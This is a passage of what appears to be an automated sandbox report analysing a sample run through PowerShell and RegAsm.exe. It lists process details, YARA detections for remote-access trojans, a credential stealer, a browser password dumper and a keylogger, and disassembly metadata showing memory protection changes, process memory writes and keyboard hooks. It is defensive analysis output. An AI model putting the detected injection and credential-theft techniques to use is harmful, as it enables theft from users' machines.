                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:02:54:05
                                                                              Start date:01/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:10
                                                                              Start time:02:54:06
                                                                              Start date:01/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x850000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 0000000A.00000002.3687725742.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:4.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:12
                                                                                Total number of Limit Nodes:0

                                                                                Executed Functions

                                                                                Function 00007FFAAC517F64 Relevance: 1.9, APIs: 1, Instructions: 439processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318467860.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac510000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: ca0820bbf51001cb8d217d4bb2c6ef1583ddb974afc7f0e6ef54106e7e608b0f
                                                                                • Instruction ID: 22307c84407ea20de0ccebab8d5999c65e0f6e61f2c9c35ee634a428a22fd985
                                                                                • Opcode Fuzzy Hash: ca0820bbf51001cb8d217d4bb2c6ef1583ddb974afc7f0e6ef54106e7e608b0f
                                                                                • Instruction Fuzzy Hash: 99D1C930518A8D8FEB78EF18CC4A7E977D1FB59311F01422AE84EC7291DE74A9458BC1
                                                                                Function 00007FFAAC517C04 Relevance: 1.6, APIs: 1, Instructions: 150injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318467860.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac510000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 146ddea50d85e3c42a4ac2501710d4a4594a70d82260ce2655bb99dab71b865a
                                                                                • Instruction ID: 295678dfd07357be3e409a89b7b1f76cace6b67b9e41810c0d3793d537667982
                                                                                • Opcode Fuzzy Hash: 146ddea50d85e3c42a4ac2501710d4a4594a70d82260ce2655bb99dab71b865a
                                                                                • Instruction Fuzzy Hash: A241E87190CB4D8FDB189B98980A6FD7BE0FB95311F00826FE44ED3292DE74A85587D1
                                                                                Function 00007FFAAC5179F8 Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318467860.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac510000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 3b9769025f7b593072c5f4c08bab6abc2eba3d99edcff11a02446d23441df062
                                                                                • Instruction ID: 530b3af5560009968775d22b10a340de4bb60645a0fbe8830d3ce151ee5ae4a7
                                                                                • Opcode Fuzzy Hash: 3b9769025f7b593072c5f4c08bab6abc2eba3d99edcff11a02446d23441df062
                                                                                • Instruction Fuzzy Hash: 68310931D0CB488FDB29EBA898496F97BE1EF56311F04422FE04AC3192DF74A4068791
                                                                                Function 00007FFAAC5178FD Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318467860.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac510000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: ce7a88f6432c5f309be65e916894f51fdd05f8c5d90c81a6cba6f3e76e5e5267
                                                                                • Instruction ID: 8e3ee48be39503d4298b353fa23ed79e976da09b106ffc3317db4ddab75d998d
                                                                                • Opcode Fuzzy Hash: ce7a88f6432c5f309be65e916894f51fdd05f8c5d90c81a6cba6f3e76e5e5267
                                                                                • Instruction Fuzzy Hash: 73310A3190D7898FDB1ADB78885A6E97FE0EF57320F0481AFD04AC71A3DA689419C791
                                                                                Function 00007FFAAC5E3825 Relevance: .3, Instructions: 287COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318879423.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac5e0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bdd862d956634c1f5a0cfb316d9b73c39da6f69fe5111245cc5590109ab9805
                                                                                • Instruction ID: 459bb5c8bd47807d672b37438ce744f3cda9ccb77c7702ff905e59b0481cdeae
                                                                                • Opcode Fuzzy Hash: 8bdd862d956634c1f5a0cfb316d9b73c39da6f69fe5111245cc5590109ab9805
                                                                                • Instruction Fuzzy Hash: 44812662A4FA9B8FF7A59B2C88555B56BD5DF86220B0C41BAE44EC31D3DF18DC0983C1
                                                                                Function 00007FFAAC5E0540 Relevance: .3, Instructions: 271COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 141 7ffaac5e0540-7ffaac5e0584 144 7ffaac5e058a-7ffaac5e0594 141->144 145 7ffaac5e068d-7ffaac5e0739 141->145 146 7ffaac5e0596-7ffaac5e05ae 144->146 147 7ffaac5e05b0-7ffaac5e05bd 144->147 179 7ffaac5e073b 145->179 180 7ffaac5e073c-7ffaac5e074d 145->180 146->147 154 7ffaac5e05bf-7ffaac5e05c2 147->154 155 7ffaac5e0631-7ffaac5e063b 147->155 154->155 157 7ffaac5e05c4-7ffaac5e05cc 154->157 158 7ffaac5e064a-7ffaac5e068a 155->158 159 7ffaac5e063d-7ffaac5e0649 155->159 157->145 161 7ffaac5e05d2-7ffaac5e05dc 157->161 158->145 163 7ffaac5e05f5-7ffaac5e05f9 161->163 164 7ffaac5e05de-7ffaac5e05f3 161->164 163->155 165 7ffaac5e05fb 163->165 164->163 170 7ffaac5e0601-7ffaac5e060a 165->170 173 7ffaac5e0623-7ffaac5e0630 170->173 174 7ffaac5e060c-7ffaac5e0619 170->174 174->173 177 7ffaac5e061b-7ffaac5e0621 174->177 177->173 179->180 182 7ffaac5e074f 180->182 183 7ffaac5e0750-7ffaac5e076b 180->183 182->183
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318879423.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac5e0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d0d2223b3736f153b1a5cf6922f4e512bb207e00e110ac31880928860aa89823
                                                                                • Instruction ID: daac0176f19c7309c7e3bc7bbf8967a5092d286a6833920dd22ce0869daed406
                                                                                • Opcode Fuzzy Hash: d0d2223b3736f153b1a5cf6922f4e512bb207e00e110ac31880928860aa89823
                                                                                • Instruction Fuzzy Hash: 8F71273294EB8A8FE795AB6C88146B57BE4EF96210B0841FBE04DC7193DE18DC49C391
                                                                                Function 00007FFAAC5E38AA Relevance: .1, Instructions: 148COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318879423.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac5e0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 286571e5890428d1d90783df168652e576b7970257753c216a54836130d850e2
                                                                                • Instruction ID: 07e74c37effd417f13a5f87689972cfe01462f9b5e21bb595333206372e4d6c2
                                                                                • Opcode Fuzzy Hash: 286571e5890428d1d90783df168652e576b7970257753c216a54836130d850e2
                                                                                • Instruction Fuzzy Hash: 6D410562E5FE978BF7959B2C886617856C5DF96260B5C80B9E44EC31D3DF0CDC0942C1
                                                                                Function 00007FFAAC5E3D36 Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 324 7ffaac5e3d36 325 7ffaac5e3d3b-7ffaac5e3d44 324->325 326 7ffaac5e3d46-7ffaac5e3d53 325->326 327 7ffaac5e3d5d-7ffaac5e3d6a 325->327 326->327 329 7ffaac5e3d55-7ffaac5e3d5b 326->329 329->327
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318879423.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac5e0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c908dfab2039803136421f5e27cf49accea0cef943ba7a9858991d22d63def50
                                                                                • Instruction ID: 2e8b0fea9ad800aff3f3d74b8df099b0f6f56c88c5da6c4ce1d96ae30deb0510
                                                                                • Opcode Fuzzy Hash: c908dfab2039803136421f5e27cf49accea0cef943ba7a9858991d22d63def50
                                                                                • Instruction Fuzzy Hash: 1DE02623E4E92E4EF2A1A26CA40A6F592C4DF4A661B0841F3F84DC3162DD049C1402C0

                                                                                Non-executed Functions

                                                                                Function 00007FFAAC5E421D Relevance: 5.4, Strings: 4, Instructions: 413COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1318879423.00007FFAAC5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaac5e0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$6$6$P*
                                                                                • API String ID: 0-3080157747
                                                                                • Opcode ID: 664167d1d59ad6eb18c0048d02330d4e6003010dab04db8ff650350be510c046
                                                                                • Instruction ID: 4da8a5375f60d461d134e100254ba81beb6511af3ae8d3e6282a36fe5173625d
                                                                                • Opcode Fuzzy Hash: 664167d1d59ad6eb18c0048d02330d4e6003010dab04db8ff650350be510c046
                                                                                • Instruction Fuzzy Hash: 60C11972A0DA4A8FE798DB5CD8455B87BD5EF9A310F0441BAE44EC3192DF24EC4A87C1

                                                                                Execution Graph

                                                                                Execution Coverage:10.1%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:16.7%
                                                                                Total number of Nodes:18
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 21440 2a63d80 21441 2a63dc4 SetWindowsHookExW 21440->21441 21443 2a63e0a 21441->21443 21444 2a63368 21445 2a633be NtProtectVirtualMemory 21444->21445 21447 2a63408 21445->21447 21448 2a69698 21449 2a696de 21448->21449 21453 2a69868 21449->21453 21458 2a69878 21449->21458 21450 2a697cb 21454 2a69842 21453->21454 21455 2a69872 21453->21455 21454->21450 21461 2a69364 21455->21461 21459 2a698a6 21458->21459 21460 2a69364 DuplicateHandle 21458->21460 21459->21450 21460->21459 21462 2a698e0 DuplicateHandle 21461->21462 21463 2a698a6 21462->21463 21463->21450

                                                                                Executed Functions

                                                                                Function 02A62F28 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 451nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 2a62f28-2a62f5c 1 2a62f5e-2a62f60 0->1 2 2a62f68-2a62f6b 0->2 3 2a632d6-2a63305 1->3 4 2a62f66 1->4 2->3 5 2a62f71-2a62f94 2->5 20 2a6330c-2a63310 3->20 4->5 8 2a62f96-2a62f98 5->8 9 2a62fa0-2a62fa3 5->9 8->3 11 2a62f9e 8->11 9->3 12 2a62fa9-2a62fcf 9->12 11->12 15 2a62fd1-2a62fd5 12->15 16 2a62fdd-2a62fe1 12->16 15->3 17 2a62fdb 15->17 16->3 18 2a62fe7-2a62ff5 16->18 17->18 24 2a62ff7-2a63002 18->24 25 2a63004-2a6300c 18->25 22 2a63312-2a6331c 20->22 23 2a6331d-2a63406 NtProtectVirtualMemory 20->23 52 2a6340f-2a63434 23->52 53 2a63408-2a6340e 23->53 26 2a6300f-2a63011 24->26 25->26 28 2a63013-2a63015 26->28 29 2a6301d-2a63020 26->29 28->3 30 2a6301b 28->30 29->3 31 2a63026-2a63049 29->31 30->31 34 2a63055-2a63058 31->34 35 2a6304b-2a6304d 31->35 34->3 38 2a6305e-2a63082 34->38 35->3 37 2a63053 35->37 37->38 41 2a63084-2a63086 38->41 42 2a6308e-2a63091 38->42 41->3 44 2a6308c 41->44 42->3 45 2a63097-2a630b8 42->45 44->45 49 2a630c4-2a630c7 45->49 50 2a630ba-2a630bc 45->50 49->3 51 2a630cd-2a630f1 49->51 50->3 54 2a630c2 50->54 58 2a630f3-2a630f5 51->58 59 2a630fd-2a63100 51->59 53->52 54->51 58->3 60 2a630fb 58->60 59->3 61 2a63106-2a6312a 59->61 60->61 64 2a63136-2a63139 61->64 65 2a6312c-2a6312e 61->65 64->3 67 2a6313f-2a63163 64->67 65->3 66 2a63134 65->66 66->67 69 2a63165-2a63167 67->69 70 2a6316f-2a63172 67->70 69->3 71 2a6316d 69->71 70->3 72 2a63178-2a6318b 70->72 71->72 72->20 74 2a63191-2a631c0 72->74 75 2a631c2-2a631c4 74->75 76 2a631cc-2a631cf 74->76 75->3 77 2a631ca 75->77 76->3 78 2a631d5-2a631ed 76->78 77->78 80 2a631ef-2a631f1 78->80 81 2a631f9-2a631fc 78->81 80->3 82 2a631f7 80->82 81->3 83 2a63202-2a63219 81->83 82->83 86 2a632c5-2a632ce 83->86 87 2a6321f-2a63242 83->87 86->74 90 2a632d4 86->90 88 2a63244-2a63246 87->88 89 2a6324e-2a63251 87->89 88->3 91 2a6324c 88->91 89->3 92 2a63257-2a63287 89->92 90->20 91->92 94 2a6328f-2a63292 92->94 95 2a63289-2a6328b 92->95 94->3 97 2a63294-2a632b1 94->97 95->3 96 2a6328d 95->96 96->97 99 2a632b3-2a632b5 97->99 100 2a632b9-2a632bc 97->100 99->3 101 2a632b7 99->101 100->3 102 2a632be-2a632c3 100->102 101->102 102->20
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A633F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID: 4|q$xX@s<h
                                                                                • API String ID: 2706961497-3602251366
                                                                                • Opcode ID: 34ea6b7dd421d766afa7b1ae65ee69e840c325d61e2d41157b853914234dd633
                                                                                • Instruction ID: 2fb27fb7b4847891f50303ab9c18561b7cc39980bb47d151205a594d9caa4a25
                                                                                • Opcode Fuzzy Hash: 34ea6b7dd421d766afa7b1ae65ee69e840c325d61e2d41157b853914234dd633
                                                                                • Instruction Fuzzy Hash: 28E19F71F003484BDF14CAB98DD43BEB6A3ABD8624F59826AD916DB3C4EF74D8068741
                                                                                Function 02A627A0 Relevance: 4.4, Strings: 3, Instructions: 648COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 541 2a627a0-2a627d4 542 2a627d6-2a627d8 541->542 543 2a627e0-2a627e3 541->543 544 2a62b4e-2a62b7d 542->544 545 2a627de 542->545 543->544 546 2a627e9-2a6280c 543->546 561 2a62b84-2a62b88 544->561 545->546 549 2a6280e-2a62810 546->549 550 2a62818-2a6281b 546->550 549->544 552 2a62816 549->552 550->544 553 2a62821-2a62847 550->553 552->553 556 2a62855-2a62859 553->556 557 2a62849-2a6284d 553->557 556->544 559 2a6285f-2a6286d 556->559 557->544 558 2a62853 557->558 558->559 565 2a6286f-2a6287a 559->565 566 2a6287c-2a62884 559->566 563 2a62b95-2a62cbc 561->563 564 2a62b8a-2a62b94 561->564 702 2a62cc2 call 2a62792 563->702 703 2a62cc2 call 2a627a0 563->703 704 2a62cc2 call 2a62bd8 563->704 567 2a62887-2a62889 565->567 566->567 569 2a62895-2a62898 567->569 570 2a6288b-2a6288d 567->570 569->544 572 2a6289e-2a628c1 569->572 570->544 571 2a62893 570->571 571->572 575 2a628c3-2a628c5 572->575 576 2a628cd-2a628d0 572->576 575->544 578 2a628cb 575->578 576->544 579 2a628d6-2a628fa 576->579 578->579 582 2a62906-2a62909 579->582 583 2a628fc-2a628fe 579->583 582->544 586 2a6290f-2a62930 582->586 583->544 585 2a62904 583->585 585->586 590 2a62932-2a62934 586->590 591 2a6293c-2a6293f 586->591 590->544 593 2a6293a 590->593 591->544 592 2a62945-2a62969 591->592 596 2a62975-2a62978 592->596 597 2a6296b-2a6296d 592->597 593->592 596->544 600 2a6297e-2a629a2 596->600 597->544 599 2a62973 597->599 599->600 603 2a629a4-2a629a6 600->603 604 2a629ae-2a629b1 600->604 603->544 606 2a629ac 603->606 604->544 607 2a629b7-2a629db 604->607 606->607 611 2a629e7-2a629ea 607->611 612 2a629dd-2a629df 607->612 611->544 614 2a629f0-2a62a03 611->614 612->544 613 2a629e5 612->613 613->614 614->561 618 2a62a09-2a62a38 614->618 619 2a62a44-2a62a47 618->619 620 2a62a3a-2a62a3c 618->620 619->544 623 2a62a4d-2a62a65 619->623 620->544 622 2a62a42 620->622 622->623 626 2a62a67-2a62a69 623->626 627 2a62a71-2a62a74 623->627 626->544 629 2a62a6f 626->629 627->544 630 2a62a7a-2a62a91 627->630 628 2a62cc8-2a62cd0 631 2a62cd2-2a62cd4 628->631 632 2a62cde-2a62ce2 628->632 629->630 642 2a62a97-2a62aba 630->642 643 2a62b3d-2a62b46 630->643 631->632 634 2a62ce4-2a62ceb 632->634 635 2a62cee-2a62cf5 632->635 636 2a62cf7-2a62d00 635->636 637 2a62d23-2a62d43 635->637 639 2a62d02-2a62d04 636->639 640 2a62d0e-2a62d20 636->640 705 2a62d44 call 2a62792 637->705 706 2a62d44 call 2a627a0 637->706 707 2a62d44 call 2a62bd8 637->707 639->640 644 2a62ac6-2a62ac9 642->644 645 2a62abc-2a62abe 642->645 643->618 646 2a62b4c 643->646 644->544 649 2a62acf-2a62aff 644->649 645->544 648 2a62ac4 645->648 646->561 647 2a62d4a-2a62d4c 650 2a62d4e-2a62d61 647->650 651 2a62d6d-2a62db9 647->651 648->649 654 2a62b07-2a62b0a 649->654 655 2a62b01-2a62b03 649->655 659 2a62d67-2a62d6a 650->659 708 2a62dbb call 2a62792 651->708 709 2a62dbb call 2a627a0 651->709 710 2a62dbb call 2a62bd8 651->710 654->544 658 2a62b0c-2a62b29 654->658 655->544 657 2a62b05 655->657 657->658 662 2a62b31-2a62b34 658->662 663 2a62b2b-2a62b2d 658->663 662->544 666 2a62b36-2a62b3b 662->666 663->544 665 2a62b2f 663->665 665->666 666->561 668 2a62dc1-2a62dc3 669 2a62dc5-2a62dc7 668->669 670 2a62dd3-2a62e3b call 2a60d7c 668->670 671 2a62dcf-2a62dd2 669->671 680 2a62e40-2a62e57 670->680 683 2a62ec2-2a62ed5 680->683 684 2a62e59-2a62e64 680->684 685 2a62ed7-2a62ee6 683->685 687 2a62e66-2a62e6c 684->687 688 2a62e7c-2a62e94 call 2a60d8c 684->688 692 2a62ef0 685->692 693 2a62ee8 685->693 690 2a62e70-2a62e72 687->690 691 2a62e6e 687->691 697 2a62e96-2a62eb3 call 2a62270 688->697 698 2a62eb5-2a62ec0 688->698 690->688 691->688 693->692 697->685 698->683 698->684 702->628 703->628 704->628 705->647 706->647 707->647 708->668 709->668 710->668
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4|q$PHq$xX@s<h
                                                                                • API String ID: 0-4256985773
                                                                                • Opcode ID: a61973422c8e8fc69c8ce54cd8acc5514da11420fa350db1d2e0f6a80f295452
                                                                                • Instruction ID: 13eef8bc609da12cd2f2a14976936e262a1d7ee7113b97565a27fe377f11a6f9
                                                                                • Opcode Fuzzy Hash: a61973422c8e8fc69c8ce54cd8acc5514da11420fa350db1d2e0f6a80f295452
                                                                                • Instruction Fuzzy Hash: F9228F71B002054BDB14DB798C943BEB6A3EBC8214F19823AEA16DB7D5DF34DD428791
                                                                                Function 02A63368 Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A633F9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3687608682.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_2a60000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: a626c788d695818f542c88c89d1806b6058402129b3f4eea481bf2e8f0c65f7b
                                                                                • Instruction ID: ddb309b30d303a3823719adcf60a07bfb68c73c7d1c608be4db7891990b2327e
                                                                                • Opcode Fuzzy Hash: a626c788d695818f542c88c89d1806b6058402129b3f4eea481bf2e8f0c65f7b
                                                                                • Instruction Fuzzy Hash: 61210FB5D013489FDB10CFAAD984BEEFBF1FF48310F20842AE519A7200CB3599018BA4
                                                                                Function 069148C8 Relevance: 5.3, Strings: 4, Instructions: 314COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 377 69148c8-69148e5 379 6914c18-6914c76 call 6911f30 call 6911f50 377->379 380 69148eb-69148ed 377->380 411 6914c78-6914c8c 379->411 412 6914c8d-6914c93 call 6914ca0 379->412 381 69148ff 380->381 382 69148ef-69148fd 380->382 384 6914901-6914903 381->384 382->384 385 6914909-6914916 384->385 386 6914bfd-6914c15 384->386 391 691491c-6914922 385->391 392 6914a6f-6914a7c 385->392 393 6914930-6914950 391->393 394 6914924-6914926 391->394 392->386 400 6914a82-6914a88 392->400 397 6914963-6914a6c 393->397 398 6914952-6914960 393->398 394->393 398->397 403 6914a96-6914b47 400->403 404 6914a8a-6914a8c 400->404 403->386 437 6914b4d-6914bfa 403->437 404->403 415 6914c99-6914c9c 412->415
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$0Fq$0Fq$$q
                                                                                • API String ID: 0-3420340418
                                                                                • Opcode ID: 29567d8cf381a7f48e861d36db8ffa62ed10e19d4b99ee882188489a0fafe0b7
                                                                                • Instruction ID: 11020ef1ac4003b62ec1da9b06eea5180ed5c0cd3c20cdd463cfefca9abaf2a1
                                                                                • Opcode Fuzzy Hash: 29567d8cf381a7f48e861d36db8ffa62ed10e19d4b99ee882188489a0fafe0b7
                                                                                • Instruction Fuzzy Hash: 56B1A074B002099FDB54DF6DC850B6EB7E6FFC9610F25842AE909DB390DE309C428BA1
                                                                                Function 06912178 Relevance: 4.0, Strings: 3, Instructions: 227COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 711 6912178-6912190 712 69121a2-69121ae 711->712 713 6912192-691219b 711->713 713->712 714 691219d-69121a0 713->714 714->712 715 69121b1-69121ba 714->715 716 69121cb-69121d2 715->716 717 69121bc-69121c8 715->717 718 69121d4-69121d6 716->718 719 69121e7-69121ee 716->719 717->716 718->719 720 69121d8-69121e4 718->720 721 6912200-6912208 719->721 722 69121f0-69121f2 719->722 720->719 724 6912219-691221d 721->724 725 691220a-6912217 721->725 722->721 723 69121f4-69121fd 722->723 723->721 727 6912226-691222b 724->727 725->727 728 6912231-691223b 727->728 729 691230e-691231a 727->729 730 6912295-69122cd 728->730 731 691223d-6912273 728->731 741 69122d3-69122fb 730->741 742 69123fc-6912421 730->742 736 69123d0-69123f5 731->736 737 6912279-6912293 731->737 736->742 737->730 750 69122fd 741->750 751 69122ff 741->751 755 6912428-6912447 742->755 753 6912302-6912305 750->753 751->753 753->729 754 6912307 753->754 754->729 754->755 756 6912375-691237a 754->756 757 691231d-6912322 754->757 758 69123c1-69123cd 756->758 759 691237c-6912387 756->759 760 6912324-691232f 757->760 761 6912369-6912372 757->761 759->758 766 6912389-69123b6 759->766 760->761 767 6912331-691235e 760->767 766->758 767->761
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.3704018367.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_6910000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q$(q$xX@s<h
                                                                                • API String ID: 0-245614387
